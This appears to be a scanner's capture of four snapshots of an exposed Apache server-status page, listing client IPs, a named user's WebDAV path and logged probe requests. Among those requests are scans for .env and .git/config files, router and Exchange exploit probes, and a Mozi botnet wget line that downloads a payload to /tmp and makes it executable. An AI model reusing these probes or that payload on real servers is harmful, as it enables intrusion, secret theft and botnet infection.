Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb1ad3436f
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Sunday, 29-Sep-2024 21:25:43 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 313 Parent Server MPM Generation: 312 Server uptime: 310 days 14 hours 26 minutes 3 seconds Server load: 0.00 0.00 0.00 Total accesses: 539641 - Total Traffic: 59.4 GB - Total Duration: 77001569 CPU Usage: u886.6 s1742.44 cu5737.92 cs1597.86 - .0371% CPU load .0201 requests/sec - 2375 B/second - 115.4 kB/request - 142.69 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12579694no1yes025001 32579695no0yes124000 Sum201 149001 ........................._________________________.............. ...........________________W________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-308-0/0/5618. 0.0033633918797400.00.00105.89 172.206.140.226h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-308-0/0/5553. 0.0033633918124310.00.0082.97 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5676. 0.003363391278564840.00.0093.96 35.203.210.62http/1.1 0-308-0/0/5588. 0.0033633908439410.00.00101.24 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5656. 0.003363392428672090.00.00104.66 91.92.249.4http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 0-308-0/0/5714. 0.003363392208721810.00.00123.40 3.83.204.156http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-308-0/0/5630. 0.003363391318425130.00.0075.35 35.203.210.62http/1.1 0-308-0/0/5623. 0.003363391848431820.00.0098.44 135.125.244.52http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-308-0/0/5547. 0.003363391338528040.00.0089.94 68.183.9.16http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 0-308-0/0/5651. 0.003363391448971070.00.00172.03 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-308-0/0/5635. 0.0033633918393120.00.0079.38 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-308-0/0/5578. 0.003363392698341260.00.0070.74 67.70.237.204http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-308-0/0/5674. 0.0033633918811050.00.0093.75 54.236.215.155http/1.1 0-308-0/0/5646. 0.003363392278704220.00.0084.83 54.236.215.155http/1.1 0-308-0/0/5683. 0.0033633958636820.00.0056.19 172.206.140.226http/1.1 0-308-0/0/5726. 0.0033633909103570.00.0095.94 106.75.156.189http/1.1ravignon.mycloud.paris:443{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"x\", 0-308-0/0/5612. 0.0033633918748030.00.00129.38 35.203.210.62http/1.1 0-308-0/0/5557. 0.0033633908549690.00.00116.44 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-308-0/0/5605. 0.003363391448316590.00.0089.75 35.203.210.62http/1.1 0-308-0/0/5532. 0.0033633918758800.00.0088.43 54.236.215.155http/1.1 0-308-0/0/5560. 0.0033633918268650.00.0064.89 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-308-0/0/5565. 0.0033633938632920.00.0067.35 172.206.140.226h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-308-0/0/5461. 0.0033633918208060.00.0075.51 54.236.215.155http/1.1 0-308-0/0/5587. 0.0033633938638990.00.0091.72 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5582. 0.003363391658645010.00.00113.21 178.238.238.29http/1.1localhost:80GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1 1-31225796940/5/7995_ 0.6161319398670.00.021824.95 78.153.140.151http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-31225796940/5/7911_ 0.8101719649810.00.041178.18 167.71.81.114http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-31225796940/4/6859_ 0.72028993450.00.031537.87 78.153.140.151http/1.1ravignon.mycloud.paris:443GET /phpinfo.php HTTP/1.1 1-31225796940/5/7491_ 0.58829919358810.00.021701.84 78.153.140.151http/1.1 1-31225796940/6/6870_ 0.73829929413160.00.031289.12 78.153.140.151http/1.1ravignon.mycloud.paris:443GET /pinfo.php HTTP/1.1 1-31225796940/6/8886_ 0.7482981179523510.00.051498.24 78.153.140.151http/1.1ravignon.mycloud.paris:443GET /public/.env HTTP/1.1 1-31225796940/4/7136_ 0.47829719256220.00.051647.32 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 1-31225796940/5/9351_ 0.6282971329362190.00.031821.90 78.153.140.151http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-31225796940/4/7368_ 0.75747409133110.00.041349.41 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 1-31225796940/7/7801_ 0.6374691409530600.00.051685.48 78.153.140.151http/1.1ravignon.mycloud.paris:443GET /?phpinfo=-1 HTTP/1.1 1-31225796940/3/7878_ 0.59746908973650.00.001953.86 78.153.140.151http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-31225796940/4/7352_ 0.7667941129528970.00.044049.57 15.235.41.22http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-31225796940/5/7017_ 0.6137841789417110.00.042085.48 45.65.9.39h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-31225796940/6/8754_ 0.59679329176810.00.001620.44 78.153.140.151http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-31225796940/5/6741_ 0.6541271649304720.00.071152.71 195.123.233.50http/1.1 1-31225796940/3/7522_ 0.6737321639160260.00.021358.69 146.185.219.13http/1.1 1-31225796940/5/7640_ 0.61399009540160.00.031838.36 5.181.27.147http/1.1 1-31225796940/5/6643_ 0.7878818979700.00.011999.98 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 1-31225796940/5/7066_ 0.6178828942910.00.012343.16 57.129.23.166http/1.1 1-31225796940/6/6749_ 0.79618011967550.00.051957.17 172.232.54.54http/1.1localhost:80GET / HTTP/1.1 1-31225796940/4/7719_ 0.62109139880.00.001898.51 78.153.140.151http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-31225796940/4/6803_ 0.7061329406980.00.013151.42 78.153.140.151http/1.1ravignon.mycloud.paris:443GET /infophp.php HTTP/1.1 1-31225796940/5/6997_ 0.80619367700.00.013639.10 13.64.239.166http/1.1localhost:80GET /hudson HTTP/1.1 1-31225796940/3/6924_ 0.5882982689455330.00.021233.18 78.153.140.151http/1.1 1-31225796940/3/6740_ 0.7211289175270.00.021602.42 78.153.140.151http/1.1ravignon.mycloud.paris:443GET /new/.env HTTP/1.1 2-308-0/0/2474. 0.0033633943357500.00.0025.22 54.236.215.155http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb6d932e0b
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Friday, 27-Sep-2024 22:02:02 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 311 Parent Server MPM Generation: 310 Server uptime: 308 days 15 hours 2 minutes 23 seconds Server load: 0.00 0.00 0.00 Total accesses: 538593 - Total Traffic: 59.4 GB - Total Duration: 76948122 CPU Usage: u899.67 s1741.12 cu5711.43 cs1586.31 - .0373% CPU load .0202 requests/sec - 2390 B/second - 115.6 kB/request - 142.869 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12571221no0yes025000 32571222no0yes124000 Sum200 149000 ........................._________________________.............. ..........._______________W_________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-308-0/0/5618. 0.0016571918797400.00.00105.89 172.206.140.226h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-308-0/0/5553. 0.0016571918124310.00.0082.97 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5676. 0.001657191278564840.00.0093.96 35.203.210.62http/1.1 0-308-0/0/5588. 0.0016571908439410.00.00101.24 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5656. 0.001657192428672090.00.00104.66 91.92.249.4http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 0-308-0/0/5714. 0.001657192208721810.00.00123.40 3.83.204.156http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-308-0/0/5630. 0.001657191318425130.00.0075.35 35.203.210.62http/1.1 0-308-0/0/5623. 0.001657191848431820.00.0098.44 135.125.244.52http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-308-0/0/5547. 0.001657191338528040.00.0089.94 68.183.9.16http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 0-308-0/0/5651. 0.001657191448971070.00.00172.03 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-308-0/0/5635. 0.0016571918393120.00.0079.38 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-308-0/0/5578. 0.001657192698341260.00.0070.74 67.70.237.204http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-308-0/0/5674. 0.0016571918811050.00.0093.75 54.236.215.155http/1.1 0-308-0/0/5646. 0.001657192278704220.00.0084.83 54.236.215.155http/1.1 0-308-0/0/5683. 0.0016571958636820.00.0056.19 172.206.140.226http/1.1 0-308-0/0/5726. 0.0016571909103570.00.0095.94 106.75.156.189http/1.1ravignon.mycloud.paris:443{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"x\", 0-308-0/0/5612. 0.0016571918748030.00.00129.38 35.203.210.62http/1.1 0-308-0/0/5557. 0.0016571908549690.00.00116.44 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-308-0/0/5605. 0.001657191448316590.00.0089.75 35.203.210.62http/1.1 0-308-0/0/5532. 0.0016571918758800.00.0088.43 54.236.215.155http/1.1 0-308-0/0/5560. 0.0016571918268650.00.0064.89 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-308-0/0/5565. 0.0016571938632920.00.0067.35 172.206.140.226h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-308-0/0/5461. 0.0016571918208060.00.0075.51 54.236.215.155http/1.1 0-308-0/0/5587. 0.0016571938638990.00.0091.72 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-308-0/0/5582. 0.001657191658645010.00.00113.21 178.238.238.29http/1.1localhost:80GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1 1-31025712210/23/7979_ 8.29482209395450.00.051824.84 45.140.17.2http/1.1 1-31025712210/25/7896_ 8.36405619644960.00.111178.08 59.184.252.214http/1.1localhost:8027;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%207 1-31025712210/42/6845_ 8.32502108989320.00.321537.77 47.99.137.64http/1.1localhost:80GET /.env HTTP/1.1 1-31025712210/31/7479_ 8.27388719351400.00.061701.73 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 1-31025712210/36/6856_ 8.37388709406040.00.731289.01 130.211.102.244http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-31025712210/34/8873_ 8.27405539519480.00.081498.16 161.35.16.72http/1.1 1-31025712210/31/7125_ 8.410669251200.00.081647.23 206.81.24.227http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-31025712210/36/9337_ 8.27142839357020.00.131821.80 167.94.145.99h2ravignon.mycloud.paris:443[0/0] init 1-31025712210/27/7356_ 8.29501909130310.00.051349.33 47.99.137.64http/1.1 1-31025712210/39/7786_ 8.34482029525290.00.111685.37 45.140.17.2http/1.1localhost:80\x03 1-31025712210/24/7864_ 8.29502108955880.00.061950.83 47.99.137.64http/1.1 1-31025712210/43/7338_ 8.33501909525560.00.154049.47 47.99.137.64http/1.1localhost:80GET /.env HTTP/1.1 1-31025712210/55/7001_ 8.15421429411740.01.152085.38 46.101.186.244http/1.1localhost:80GET / HTTP/1.1 1-31025712210/32/8738_ 8.3642142659176150.00.111620.40 135.125.244.52http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-31025712210/30/6725_ 8.29109298170.02.851152.57 206.81.24.227h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-31025712210/41/7512_ 8.31142809154730.00.301358.59 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 1-31025712210/41/7623_ 8.410849537260.00.821838.29 206.81.24.227http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-31025712210/30/6628_ 8.021428638971740.00.041999.87 167.94.145.99h2ravignon.mycloud.paris:443[0/0] done 1-31025712210/42/7052_ 8.37190018941540.00.112343.08 43.156.168.214http/1.1localhost:80GET / HTTP/1.1 1-31025712210/32/6734_ 8.311899111963960.00.091957.03 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 1-31025712210/34/7706_ 8.32139137130.00.071898.41 206.81.24.227h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-31025712210/36/6789_ 8.2824829404000.00.313151.36 147.185.132.34http/1.1 1-31025712210/30/6982_ 8.32502009361380.00.153638.97 47.99.137.64http/1.1localhost:80GET /sendgrid/.env HTTP/1.1 1-31025712210/32/6911_ 8.29481809440040.00.091230.17 161.35.205.80http/1.1localhost:80GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1 1-31025712210/38/6729_ 8.29502009170390.00.071602.33 47.99.137.64http/1.1 2-308-0/0/2474. 0.0016571943357500.00.0025.22 54.236.215.155http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fbe5f82d06
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Wednesday, 25-Sep-2024 20:20:22 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 309 Parent Server MPM Generation: 308 Server uptime: 306 days 13 hours 20 minutes 42 seconds Server load: 0.00 0.00 0.00 Total accesses: 532127 - Total Traffic: 59.3 GB - Total Duration: 76901919 CPU Usage: u902.4 s1732.65 cu5654.09 cs1559.83 - .0372% CPU load .0201 requests/sec - 2404 B/second - 116.9 kB/request - 144.518 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02562647no0yes124000 22562648no0yes025000 Sum200 149000 ______________W__________.........................______________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-30825626470/50/5618_ 8.88118797400.00.09105.89 68.183.9.16http/1.1 0-30825626470/31/5553_ 10.41952418124310.00.8482.97 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-30825626470/43/5675_ 11.031286208563560.00.0793.94 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-30825626470/22/5588_ 10.36333408439410.00.23101.24 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-30825626470/36/5654_ 11.06879648669640.01.48104.62 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 0-30825626470/28/5712_ 9.97333408719590.00.08123.37 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-30825626470/30/5629_ 10.731258508423820.00.2475.33 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-30825626470/24/5621_ 9.931258528428640.02.6198.40 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-30825626470/50/5546_ 11.041258518526710.00.1389.92 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-30825626470/33/5651_ 10.6187911448971070.00.11172.03 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-30825626470/52/5635_ 11.04952918393120.00.1679.38 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-30825626470/25/5577_ 10.41952408338570.00.1170.72 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-30825626470/34/5674_ 9.96476918811050.01.7693.75 89.248.167.131http/1.1 0-30825626470/49/5645_ 11.08334828701950.03.0184.80 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 0-30825626471/28/5682W 10.72008636770.00.1256.19 68.183.9.16http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 0-30825626470/59/5725_ 10.63879109103570.00.1295.94 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-30825626470/34/5612_ 10.581285718748030.00.31129.38 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-30825626470/27/5556_ 9.51476918549680.00.11116.44 89.248.167.131http/1.1 0-30825626470/52/5604_ 8.781285608315150.00.1589.74 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-30825626470/41/5531_ 11.08333908758790.00.1088.42 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 0-30825626470/45/5560_ 11.09122218268650.00.3064.89 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-30825626470/30/5565_ 9.921286238632920.00.0567.35 185.117.37.101h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-30825626470/36/5461_ 9.88334818208060.00.2075.51 54.37.79.75http/1.1 0-30825626470/31/5587_ 8.37121738638990.00.0591.72 185.117.37.101h2ravignon.mycloud.paris:443[0/0] init 0-30825626470/37/5581_ 10.75125841658645010.00.37113.21 185.117.37.101h2ravignon.mycloud.paris:443[1/1] done 1-306-0/0/7929. 0.0015961829391050.00.001824.72 134.209.25.199http/1.1 1-306-0/0/7840. 0.0015961859638640.00.001177.92 134.209.25.199http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-306-0/0/6777. 0.0015961808983320.00.001537.39 185.171.84.36h2ravignon.mycloud.paris:443[0/0] init 1-306-0/0/7415. 0.001596181689350360.00.001701.43 134.209.25.199http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-306-0/0/6786. 0.0015961819405130.00.001288.23 134.209.25.199http/1.1 1-306-0/0/8796. 0.0015961809515170.00.001498.02 54.37.79.75http/1.1 1-306-0/0/7053. 0.0015961809241950.00.001647.08 185.171.84.36h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-306-0/0/9258. 0.001596181289350510.00.001821.60 134.209.25.199http/1.1ravignon.mycloud.paris:443GET /.DS_Store HTTP/1.1 1-306-0/0/7293. 0.0015961819126730.00.001349.25 54.37.79.75http/1.1 1-306-0/0/7702. 0.0015961819513850.00.001685.18 198.235.24.24http/1.1localhost:80GET / HTTP/1.0 1-306-0/0/7801. 0.0015961828953290.00.001950.69 185.171.84.36h2ravignon.mycloud.paris:443[0/0] init 1-306-0/0/7254. 0.0015961809510440.00.004049.23 54.37.79.75http/1.1 1-306-0/0/6917. 0.001596181869405820.00.002084.19 146.190.150.26http/1.1ravignon.mycloud.paris:443GET /ab2g HTTP/1.1 1-306-0/0/8664. 0.0015961809165920.00.001620.22 172.212.59.78http/1.1localhost:80GET /hudson HTTP/1.1 1-306-0/0/6660. 0.0015961809293080.00.001149.69 185.171.84.36h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-306-0/0/7435. 0.0015961809149530.00.001358.25 185.171.84.36h2ravignon.mycloud.paris:443[0/0] init 1-306-0/0/7538. 0.0015961819529820.00.001837.41 45.65.9.39h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-306-0/0/6563. 0.0015961818968000.00.001999.76 5.34.178.101http/1.1 1-306-0/0/6979. 0.0015961808938540.00.002342.93 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 1-306-0/0/6674. 0.00159618011957260.00.001956.92 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 1-306-0/0/7634. 0.0015961809128770.00.001898.25 185.224.128.59http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 1-306-0/0/6715. 0.0015961809398190.00.003150.97 146.190.150.26http/1.1 1-306-0/0/6915. 0.0015961829351270.00.003638.75 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 1-306-0/0/6836. 0.00159618849430600.00.001229.99 146.190.150.26http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-306-0/0/6656. 0.001596182319170350.00.001602.22 134.209.25.199http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 2-308
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb20231ee8
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Monday, 23-Sep-2024 21:41:56 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 307 Parent Server MPM Generation: 306 Server uptime: 304 days 14 hours 42 minutes 17 seconds Server load: 0.08 0.02 0.01 Total accesses: 527700 - Total Traffic: 59.3 GB - Total Duration: 76840171 CPU Usage: u874.16 s1710.38 cu5642.32 cs1554.67 - .0372% CPU load .0201 requests/sec - 2417 B/second - 117.8 kB/request - 145.613 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12554163no0yes124000 32554164no0yes025000 Sum200 149000 ........................._W_______________________.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-301-0/0/5565. 0.0042371418788700.00.00105.75 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5512. 0.0042371418110840.00.0082.02 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 0-301-0/0/5628. 0.0042371418560590.00.0093.84 162.142.125.219http/1.1 0-301-0/0/5562. 0.0042371428433320.00.00100.97 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5612. 0.0042371408661390.00.00103.11 57.129.23.166http/1.1localhost:80GET /.env HTTP/1.1 0-301-0/0/5677. 0.0042371418713640.00.00123.25 34.135.151.125http/1.1ravignon.mycloud.paris:80GET / HTTP/1.1 0-301-0/0/5595. 0.0042371418415760.00.0075.07 147.185.132.255http/1.1localhost:80\x16\x03\x01 0-301-0/0/5590. 0.004237141958426340.00.0095.75 57.129.23.166http/1.1 0-301-0/0/5490. 0.0042371408518920.00.0089.73 123.163.114.252http/1.1localhost:80GET /favicon.ico HTTP/1.1 0-301-0/0/5616. 0.004237142668968220.00.00171.89 83.222.191.62http/1.1ravignon.mycloud.paris:443GET /geoserver/wfs?service=wfs&version=2.0.0&request=GetPropert 0-301-0/0/5577. 0.0042371428388340.00.0079.16 94.156.71.65http/1.1 0-301-0/0/5546. 0.0042371448335620.00.0070.58 95.214.55.138http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5634. 0.004237141658805690.00.0091.98 167.94.145.100h2ravignon.mycloud.paris:443[0/0] init 0-301-0/0/5589. 0.0042371438684930.00.0081.71 162.142.125.202http/1.1localhost:80GET / HTTP/1.1 0-301-0/0/5649. 0.00423714868625770.00.0056.01 162.142.125.202http/1.1 0-301-0/0/5659. 0.004237141729095870.00.0095.77 15.235.41.22http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-301-0/0/5572. 0.004237142418746450.00.00129.02 167.94.145.100h2ravignon.mycloud.paris:443[0/0] done 0-301-0/0/5523. 0.0042371428544450.00.00116.29 162.142.125.219http/1.1 0-301-0/0/5548. 0.0042371418302440.00.0089.52 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 0-301-0/0/5481. 0.0042371428753200.00.0088.25 57.129.23.166http/1.1localhost:80POST / HTTP/1.1 0-301-0/0/5506. 0.004237141458262990.00.0064.52 162.142.125.219http/1.1 0-301-0/0/5531. 0.0042371408629450.00.0067.26 57.129.23.166http/1.1 0-301-0/0/5421. 0.0042371408207980.00.0075.30 57.129.23.166http/1.1 0-301-0/0/5548. 0.004237142188637390.00.0091.62 172.168.41.2http/1.1ravignon.mycloud.paris:443GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1 0-301-0/0/5538. 0.0042371408637570.00.00112.75 167.94.145.100http/1.1 1-30625541630/13/7929_ 2.95129391050.00.241824.72 134.209.25.199http/1.1 1-30625541631/19/7839W 2.99009638580.00.061177.92 134.209.25.199http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-30625541630/11/6777_ 2.55108983320.00.011537.39 185.171.84.36h2ravignon.mycloud.paris:443[0/0] init 1-30625541630/11/7415_ 3.0611689350360.00.081701.43 134.209.25.199http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-30625541630/17/6786_ 2.87119405130.00.031288.23 134.209.25.199http/1.1 1-30625541630/22/8796_ 2.61109515170.00.071498.02 54.37.79.75http/1.1 1-30625541630/12/7053_ 2.781172609241950.00.011647.08 185.171.84.36h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-30625541630/17/9257_ 3.00854519349220.00.051821.59 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-30625541630/10/7293_ 1.59854519126730.00.011349.25 54.37.79.75http/1.1 1-30625541630/17/7701_ 3.00854539513830.00.051685.17 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 1-30625541630/13/7801_ 2.12222328953290.00.031950.69 185.171.84.36h2ravignon.mycloud.paris:443[0/0] init 1-30625541630/17/7254_ 2.63854509510440.00.024049.23 54.37.79.75http/1.1 1-30625541630/13/6917_ 2.9453901869405820.01.682084.19 146.190.150.26http/1.1ravignon.mycloud.paris:443GET /ab2g HTTP/1.1 1-30625541630/16/8663_ 3.01787619165920.00.061620.22 172.212.61.58http/1.1localhost:80GET /ReportServer HTTP/1.1 1-30625541630/16/6660_ 2.91787109293080.00.031149.69 185.171.84.36h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-30625541630/16/7435_ 2.41787109149530.01.371358.25 185.171.84.36h2ravignon.mycloud.paris:443[0/0] init 1-30625541630/14/7538_ 3.01559819529820.00.031837.41 149.50.103.48http/1.1localhost:80GET / HTTP/1.1 1-30625541630/16/6563_ 2.92559318968000.00.051999.76 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 1-30625541630/11/6978_ 2.81559308938530.00.682342.92 185.171.84.36h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-30625541630/22/6674_ 3.015395011957260.00.031956.92 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 1-30625541630/14/7634_ 3.01409109128770.00.011898.25 185.224.128.59http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 1-30625541630/9/6715_ 2.60408609398190.00.013150.97 146.190.150.26http/1.1 1-30625541630/13/6915_ 3.02222929351270.00.083638.75 185.191.126.213http/1.1localhost:80GET / HTTP/1.1 1-30625541630/12/6836_ 2.952224849430600.00.041229.99 146.190.150.26http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-30625541630/15/6656_ 3.0412319170350.00.081602.22 134.209.25.199http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 2-283-0/0/2318. 0.00197891423334110.00.0024.70 95.214.55.138http/1.1localhost:80GET / HTTP/1.1 2-283-0/0/2286. 0.0019789141273507470.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb134234e9
